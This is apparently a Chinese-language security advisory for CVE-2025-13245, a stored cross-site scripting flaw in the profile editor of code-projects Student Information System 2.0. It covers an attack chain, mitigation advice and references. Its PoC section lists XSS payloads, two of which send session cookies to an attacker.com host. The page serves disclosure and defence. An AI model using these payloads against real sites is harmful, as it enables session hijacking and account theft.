CVE-2025-13245 CVSS 3.5 低危

CVE-2025-13245 code-projects Student Information System 2.0 XSS漏洞

披露日期: 2025-11-16

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13245

漏洞类型

跨站脚本攻击(XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

code-projects Student Information System 2.0

漏洞概述

CVE-2025-13245是code-projects Student Information System 2.0中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于/editprofile.php文件中，由于对用户输入缺乏适当的输入验证和输出编码，攻击者可以在用户个人资料中注入恶意JavaScript代码。当其他用户或管理员查看包含恶意代码的用户资料时，攻击脚本将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取或钓鱼攻击。此漏洞需要低权限用户进行操作，但不需要特殊的技术能力即可利用，攻击复杂度较低。

技术细节

该漏洞为存储型XSS（Stored XSS），存在于Student Information System 2.0的/editprofile.php文件中的用户资料更新功能。攻击者通过在个人资料字段（如姓名、邮箱、地址等）中注入恶意JavaScript代码，当数据被存储到数据库后，任何查看该用户资料的用户都会触发恶意代码执行。攻击者可利用此漏洞窃取用户会话cookie、劫持用户账户或进行钓鱼攻击。由于漏洞位于用户资料更新模块，攻击者需要拥有有效账户并具备低权限即可实施攻击，攻击成功需要目标用户查看包含恶意代码的资料页面。

攻击链分析

STEP 1

步骤1

攻击者注册或获取一个低权限账户，登录到Student Information System 2.0

STEP 2

步骤2

导航到/editprofile.php个人资料编辑页面

STEP 3

步骤3

在个人资料表单字段（如姓名、地址等）中注入恶意XSS payload

STEP 4

步骤4

提交表单，恶意代码被存储到数据库中

STEP 5

步骤5

当其他用户或管理员查看该用户资料时，恶意JavaScript代码在受害者浏览器中执行

STEP 6

步骤6

攻击者通过XSS成功窃取会话cookie、劫持账户或获取敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-13245 PoC - Stored XSS in Student Information System 2.0 -->
<!-- Target: /editprofile.php -->
<!-- Steps: -->
<!-- 1. Login with a valid low-privilege account -->
<!-- 2. Navigate to profile edit page -->
<!-- 3. Inject XSS payload in one of the profile fields -->
<!-- 4. Save the profile -->
<!-- 5. When admin/user views the profile, XSS will be triggered -->

<!-- Basic XSS PoC payload -->
<script>alert(document.cookie)</script>

<!-- Alternative payload using img tag -->
<img src=x onerror="alert('XSS Triggered')">

<!-- Cookie stealing payload -->
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

<!-- HTML Injection variant -->
<img src=x onerror=document.location='https://attacker.com/log?cookie='+document.cookie>

影响范围

code-projects Student Information System 2.0

防御指南

临时缓解措施

在用户输入输出点部署Web应用防火墙(WAF)规则过滤恶意脚本标签；限制用户输入字段的特殊字符；临时禁用个人资料查看功能直到漏洞修复；监控异常请求模式。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13245
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13245
3 Details https://www.cvedetails.com/cve/CVE-2025-13245/
4 VulDB https://vuldb.com/cve/CVE-2025-13245
5 Link https://code-projects.org/
6 Link https://github.com/asd1238525/cve/blob/main/xss7.md
7 Link https://vuldb.com/?ctiid.332571
8 Link https://vuldb.com/?id.332571
9 Link https://vuldb.com/?submit.687531

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表